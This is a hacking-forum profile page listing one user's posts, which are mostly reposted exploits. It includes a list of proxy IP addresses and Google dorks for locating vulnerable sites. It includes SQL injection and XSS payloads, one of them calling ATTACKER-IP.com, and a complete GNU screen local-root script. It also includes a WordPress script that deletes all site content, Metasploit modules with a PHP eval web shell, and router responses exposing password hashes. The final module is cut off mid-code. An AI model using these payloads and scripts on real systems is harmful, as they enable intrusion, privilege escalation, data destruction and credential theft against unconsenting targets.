Jump to content

geeko

Active Members
  • Content Count

    61
  • Joined

  • Last visited

Everything posted by geeko

  1. 46.99.133.241:1080 66.58.244.108:24705 71.228.211.89:17002 45.63.90.226:6789 162.254.168.154:56499 68.7.156.247:13623 104.238.183.182:6789 67.197.149.140:18293 104.219.112.114:52862 208.104.74.191:27899 47.35.38.116:57216 108.218.207.108:30049 183.232.25.100:4080 107.151.129.249:1080 68.178.128.170:18749 45.63.82.190:6789 24.2.70.116:24182 180.92.239.217:1080 97.82.41.68:40641 45.63.88.229:6789 72.243.180.159:45554 24.196.134.76:18527 186.121.206.234:1080 67.197.28.10:43491 45.63.83.124:6789 64.126.70.72:53473 8.30.102.50:45554 76.8.208.230:45554 204.248.125.246:45554 104.207.150.81:6789 184.20.102.255:1080 66.167.193.138:22010 45.32.130.95:6789 47.208.147.42:27181 63.240.250.44:50652 67.170.49.111:29381 223.25.99.163:1180 47.222.33.206:55495 76.29.93.253:50999 73.25.253.84:25242 104.238.182.74:6789 64.121.199.87:20985 24.189.131.7:19821 208.74.33.114:10223 45.63.88.181:6789 173.208.137.46:6789 24.178.207.30:10379 75.118.153.228:10200 208.104.74.89:27677 45.32.130.120:6789 27.123.1.162:1080 216.10.224.223:45554 24.74.75.139:34070 96.237.161.130:46555 117.74.120.81:1080 74.75.164.255:10200 97.99.103.153:53293 75.151.213.85:3366 162.213.178.102:45554 68.64.229.84:45554 36.66.213.167:1080 45.63.88.187:6789 208.104.74.229:27809 47.35.79.9:46845 24.240.255.93:12666 45.32.139.243:6789 100.42.158.187:45554 75.76.230.236:45554 104.238.180.134:6789 208.104.232.210:52886 72.91.84.235:51815 209.159.251.12:56511 67.197.232.209:23864 104.238.183.133:6789 97.77.75.181:28111 73.181.120.114:59152 216.24.77.41:17382 45.32.213.237:6789 45.63.90.33:6789 45.63.89.78:6789 216.212.236.240:45554 54.215.184.209:34646 76.29.6.56:40178 73.199.232.15:30495 45.32.141.69:6789 91.195.103.172:31336 73.15.240.216:28416 76.94.99.191:63798 76.25.126.209:58399 45.63.84.133:6789 24.16.89.71:38784 45.32.130.189:6789 45.32.137.112:6789 68.117.143.146:17472 68.81.198.11:21645 45.32.128.60:6789 190.129.1.141:46690 175.143.94.161:10233 123.207.167.125:1080 67.197.251.54:20191 104.244.223.85:24950 24.72.213.167:45554 174.141.178.158:45554 63.142.208.138:14803 45.32.141.196:6789 24.93.138.78:10200 104.241.13.16:10200 208.104.74.50:27766 67.197.236.88:22961 45.55.28.39:21532 104.220.172.192:14811 70.99.133.238:15466 72.47.70.110:55446 104.244.140.93:45554 73.13.150.205:12327 208.111.120.173:10200 67.197.29.170:43075 68.225.192.228:21202 73.59.46.201:45554 103.195.142.88:9999 173.26.244.42:36839 67.197.253.126:18583 67.197.232.59:24018 64.4.99.16:62915 67.197.29.186:43091 180.178.104.178:1080 45.55.28.39:24609 66.110.216.105:39431 64.184.5.7:45554 68.198.171.167:29702 104.219.112.98:16329 24.249.92.200:45554 45.63.94.22:6789 45.63.85.71:6789 45.32.136.150:6789 70.234.238.97:8088 45.63.93.251:6789 96.27.214.206:45554 64.185.49.177:45554 115.133.125.17:55363 45.63.91.180:6789 47.88.77.171:1080 67.197.252.158:18807 67.50.240.12:26089 104.238.180.191:6789
  2. Dork: intext:"Powered by ENS Consultants" |=============================================================| | | | Exploit Title :ENS Consultants Bypass Login Vulnerability | | | Google Dork intext:"Powered by ENS Consultants" | Tested on : Paroot | |======================================| | | Tutorial : | | Search The Dork Or Go To Vendor HomePage And Select Your Target | Then Go To Admin Panel At : /admin/login.php | And Open Noredirect Add-Ons And Click On "Add" | Paste The Target With ^ Character : ^Target | At Last Change Url To : site/admin/index.php | Upload Your Shell And Enjoy ! | |=============================================================|
  3. # # # # # # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection # Google Dork: inurl:index.php?option=com_abstract # Date: 02.03.2017 # Vendor Homepage: http://joomla6teen.com/ # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/ # Demo: http://demo.joomla6teen.com/abstractmanager # Version: 2.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid= # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL] # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 # # # # #
  4. passfile-ul care tu il cauti defapt e un wordlist ....sau password list .... ti l poti face singur fara stres depinzand de tarile care vrei sa le scanezi sau daca vrei sa dai random poti folosi ceva general care le poti gasi la un singur search pe google
  5. [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt [+] ISR: ApparitionSec Vendor: ========== sourceforge.net/projects/phpshell/ phpshell.sourceforge.net/ Product: ============= PHPShell v2.4 Vulnerability Type: ==================== Cross Site Scripting CVE Reference: ============== N/A Security Issue: ================ Multiple cross site scripting entry points exist in PHPShell undermining the integrity between users browser and server. Allowing remote attackers to bypass access controls such as the same-origin policy. If an authenticated user clicks an attacker supplied link. XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL, PHPShell simply reads our XSS payload in the URL and echoes it back to client. <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post"> Since PHPShell purpose is to execute system commands this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: " http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt " Tested successfully in Firefox Exploit/POC: ============= XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E OR Inject IFRAME to phish and steal credentials, you get the idea. http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!-- XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php On the Login Authentication HTML form 'username' input field " onMousemove="alert(document.cookie) enter a password and hit Enter. Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: =============================== Vendor Notification: No reply In addition the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404 http://sourceforge.net/tracker/?group_id=156638 February 18, 2017 : Public Disclosure
  6. Cisco ASA: Buffer overflows in WebVPN cifs handling CVE-2017-3807 The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: <a href="https://portal/+webvpn+/CIFS_R/share_server/share_name/file" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/share_server/share_name/file</a>. When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct: http_cifs_context: +0x160 char* file_dir +0x168 char* file_name These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode: filename_copy_buf = calloc(1LL, 336LL); net_handle[10] = filename_copy_buf; if ( filename_copy_buf ) { src_len = _wrap_strlen(filename_from_request); if ( filename_from_request[src_len - 1] == ('|') ) { // wrong length (src length) strncpy((char *)filename_copy_buf, filename_from_request, src_len - 1); } In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow. There appear to be various other places where the copying is done in an unsafe way: http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer. http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy. Possibly http_add_query_str_from_context. There are probably others that I missed. Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist. Repro: Login to WebVPN portal, navigate to: <a href="https://portal/+webvpn+/CIFS_R/server/name/" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/server/name/</a> followed by 500 'A's. ("server" and "name" may be passed verbatim) *** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 *** ======= Backtrace: ========= /lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f] /lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee] /lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99] /lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0] lina(+0x321976a)[0x7fa41a2b276a] lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83] lina(resMgrCalloc+0x100)[0x7fa419659410] lina(calloc+0x94)[0x7fa419589a34] lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608] lina(ewsServeFindDocument+0x142)[0x7fa418278192] lina(ewsServeStart+0x114)[0x7fa4182784a4] lina(ewsParse+0x19a0)[0x7fa418272cc0] lina(ewsRun+0x9c)[0x7fa41826955c] lina(emweb_th+0x6ab)[0x7fa418286aeb] lina(+0xde58ab)[0x7fa417e7e8ab] This was tested on 9.6(2) This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
  7. [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt [+] ISR: ApparitionSec Vendor: =============== www.sawmill.net Product: ======================== Sawmill Enterprise v8.7.9 sawmill8.7.9.4_x86_windows.exe hash: b7ec7bc98c42c4908dfc50450b4521d0 Sawmill is a powerful heirarchical log analysis tool that runs on every major platform. Vulnerability Type: =================================== Pass the Hash Authentication Bypass CVE Reference: ============== CVE-2017-5496 Security Issue: ===================== Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking account password hashes. This issue usually is known to affect Windows systems e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable Web application. Sawmill account password hashes are stored under LogAnalysisInfo/ directory in "users.cfg". e.g. users = { root_admin = { username = "admin" password_checksum = "e99a18c428cb38d5f260853678922e03" email_address = "" This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmills authenticaton process. Moreover, since 'users.cfg' file is world readble a regular non Admin Windows user who logs into the system running sawmill can now grab a password hash and easily login to the vulnerable application without the needing the password itself. How to test? Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non Administrator user. 1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash. 2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin. Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no salt. e.g. password: abc123 MD5 hash: e99a18c428cb38d5f260853678922e03 Disclosure Timeline: ===================================== Vendor Notification: January 7, 2017 CVE-2017-5496 assigned : January 20 Request status : January 26 Vendor: Fix avail later in year still no ETA Inform vendor public disclose date February 18, 2017 : Public Disclosure Network Access: =============== Remote Impact: ====================== Information Disclosure Privilege Escalation Severity Level: ================ High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  8. ############################################################# # Application Name : SQLi in Dejabú's Scripts # Vulnerable Type : SQL İnjection # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id= # Author: fl3xpl0it a.k.a KurokoTetsuya # Date: 20.02.2017 # Tested On Demo Sites: [+] http://www.cepaproduccion.com/content/news.php?id=1114' [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2 # Warning: If you not found SQLi , you try SQLi other parameter. # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi) # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected) #############################################################
  9. # Exploit Title: Polycom VVX Web Interface - Change Admin Password as User # Date: January 26, 2017 # Exploit Author: Mike Brown # Vendor Homepage: http://www.polycom.com/ # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436 # CVE : N/A # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface. # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses # and account information. 1. Login with the "User" Account. 2. Navigate to Settings > Change Password. 3. Fill in "Old Password" with the current "User" password. 4. Fill in "New Password" with the new "Admin" account password, and confirm. 5. Using a live HTML editor, inspect the old password field. you will see: <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password"> 6. Change the name field to "120" 7. Click "Save" 8. An error will be shown on screen but you can now log into the Admin account with the new password.
  10. #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
  11. # Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read # Date: 27/01/2017 # Exploit Author: Saeid Atabaki # Version: RG4332_V2.7.0 # Tested on: RG4332 with mini_http 1.19 = 1 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh = 2 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  12. * Exploit Title: Bulk Delete [Privilege Escalation] * Discovery Date: 2016-02-10 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: http://bulkwp.com/ * Software Link: https://wordpress.org/plugins/bulk-delete/ * Version: 5.5.3 * Tested on: WordPress 4.4.2 * Category: WebApps, WordPress Description ----------- _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are: - `bd_delete_pages_by_status`: deletes all pages by status - `bd_delete_posts_by_post_type`: deletes all posts by type - `bd_delete_users_by_meta`: delete all users with a specific pair of meta name, meta value Nearly all actions registered by this plugin can be performed from any user, as long as they passed to a query var named `bd_action` and the user has a valid account. These actions would normally require administrative wrights, so we can consider this as a privilege escalation vulnerability. PoC --- The following script will delete all pages, posts and users from the infected website. ``` #!/usr/bin/python3 ######################################################################## ######## # Bulk Delete Privilege Escalation Exploit # # **IMPORTANT** Don't use this in a production site, if vulnerable it wi ll # delete nearly all your sites content # # Author: Panagiotis Vagenas <pan.vagenas@gmail.com> ######################################################################## ######## import requests loginUrl = 'http://example.com/wp-login.php' adminUrl = 'http://example.com/wp-admin/index.php' loginPostData = { 'log': 'username', 'pwd': 'password', 'rememberme': 'forever', 'wp-submit': 'Log+In' } l = requests.post(loginUrl, data=loginPostData) if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0: print("Couldn't acquire a valid session") exit(1) loggedInCookies = l.history[0].cookies def do_action(action, data): try: requests.post( adminUrl + '?bd_action=' + action, data=data, cookies=loggedInCookies, timeout=30 ) except TimeoutError: print('Action ' + action + ' timed out') else: print('Action ' + action + ' performed') print('Deleting all pages') do_action( 'delete_pages_by_status', { 'smbd_pages_force_delete': 'true', 'smbd_published_pages': 'published_pages', 'smbd_draft_pages': 'draft_pages', 'smbd_pending_pages': 'pending_pages', 'smbd_future_pages': 'future_pages', 'smbd_private_pages': 'private_pages', } ) print('Deleting all posts from all default post types') do_action('delete_posts_by_post_type', {'smbd_types[]': [ 'post', 'page', 'attachment', 'revision', 'nav_menu_item' ]}) print('Deleting all users') do_action( 'delete_users_by_meta', { 'smbd_u_meta_key': 'nickname', 'smbd_u_meta_compare': 'LIKE', 'smbd_u_meta_value': '', } ) exit(0) ``` Solution -------- Upgrade to v5.5.4 Timeline -------- 1. **2016-02-10**: Requested CVE ID 2. **2016-02-10**: Vendor notified through wordpress.org support forums 3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com 4. **2016-02-10**: Vendor responded and received details about the issue 5. **2016-02-10**: Vendor verified vulnerability 6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue exploit source : packetstormsecurity.com
  13. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File def initialize(info={}) super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ This module will generate a .NET service executable on the target and utilise InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be added easily. }, 'License' => MSF_LICENSE, 'Author' => [ 'Casey Smith', # Original AppLocker bypass research 'OJ Reeves' # MSF module ], 'Platform' => [ 'win' ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'Aug 3 2015', 'References' => [ ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] ] )) register_options([ OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])]) end # Run Method for when run command is issued def exploit if datastore['TECHNIQUE'] == 'INSTALLUTIL' if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') end end # sysinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? if datastore['TECHNIQUE'] == 'INSTALLUTIL' execute_installutil end end def execute_installutil envs = get_envs('TEMP', 'windir') dotnet_path = get_dotnet_path(envs['windir']) print_status("Using .NET path #{dotnet_path}") cs_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.cs" exe_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.exe" installutil_path = "#{dotnet_path}InstallUtil.exe" print_status("Writing payload to #{cs_path}") write_file(cs_path, generate_csharp_source) register_files_for_cleanup(cs_path) print_status("Compiling payload to #{exe_path}") csc_path = "#{dotnet_path}csc.exe" csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") print_status("Executing payload ...") vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) register_files_for_cleanup(exe_path) end def get_dotnet_path(windir) base_path = "#{windir}Microsoft.NETFramework#{payload.arch.first == 'x86' ? '' : '64'}" paths = dir(base_path).select {|p| p[0] == 'v'} dotnet_path = nil paths.reverse.each do |p| path = "#{base_path}#{p}" if directory?(path) && file?("#{path}InstallUtil.exe") dotnet_path = path break end end unless dotnet_path fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end dotnet_path end def generate_csharp_source sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') cs = %Q^ using System; namespace Pop { public class Program { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] public class Pop : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; private static UInt32 INFINITE = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); public override void Uninstall(System.Collections.IDictionary s) { byte[] sc = new byte[] {#{sc}}; IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); IntPtr id = IntPtr.Zero; WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); } } } ^ cs end end exploit source : packetstormsecurity.com
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication and reach the administrators interface where they can upload malcious code. You are required to login to the target to reach the SQL Injection, however this can be done as a student account and remote registration is enabled by default. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code ], 'References' => [ [ 'CVE', '2016-2555' ], [ 'URL', 'http://www.atutor.ca/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Mar 1 2016', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end def print_status(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def check # the only way to test if the target is vuln begin test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end if test_injection(test_cookie) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def create_zip_file zip_file = Rex::Zip::Archive.new @header = Rex::Text.rand_text_alpha_upper(4) @payload_name = Rex::Text.rand_text_alpha_lower(4) @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}") zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") zip_file.pack end def exec_code send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" }) end def upload_shell(cookie) post_data = Rex::MIME::Message.new post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name="modulefile"; filename="#{@plugin_name}.zip"") post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name="install_upload"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie, 'agent' => 'Mozilla' }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla', }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), 'cookie' => cookie, 'agent' => 'Mozilla', }) return true end end # auth failed if we land here, bail fail_with(Failure::Unknown, "Unable to upload php code") return false end def get_hashed_password(token, password, bypass) if bypass return Rex::Text.sha1(password + token) else return Rex::Text.sha1(Rex::Text.sha1(password) + token) end end def login(username, password, bypass) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "login.php"), 'agent' => 'Mozilla', }) token = $1 if res.body =~ /) + "(.*)");/ cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/ if bypass password = get_hashed_password(token, password, true) else password = get_hashed_password(token, password, false) end res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "login.php"), 'vars_post' => { 'form_password_hidden' => password, 'form_login' => username, 'submit' => 'Login' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/ # this is what happens when no state is maintained by the http client if res && res.code == 302 if res.redirection.to_s.include?('bounce.php?course=0') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ if res && res.code == 302 && res.redirection.to_s.include?('users/index.php') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ return cookie end else res.redirection.to_s.include?('admin/index.php') # if we made it here, we are admin return cookie end end # auth failed if we land here, bail fail_with(Failure::NoAccess, "Authentication failed with username #{username}") return nil end def perform_request(sqli, cookie) # the search requires a minimum of 3 chars sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" rand_key = Rex::Text.rand_text_alpha(1) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"), 'vars_post' => { "search_friends_#{rand_key}" => sqli, 'rand_key' => rand_key, 'search' => 'Search People' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) return res.body end def dump_the_hash(cookie) extracted_hash = "" sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" login_and_hash_length = 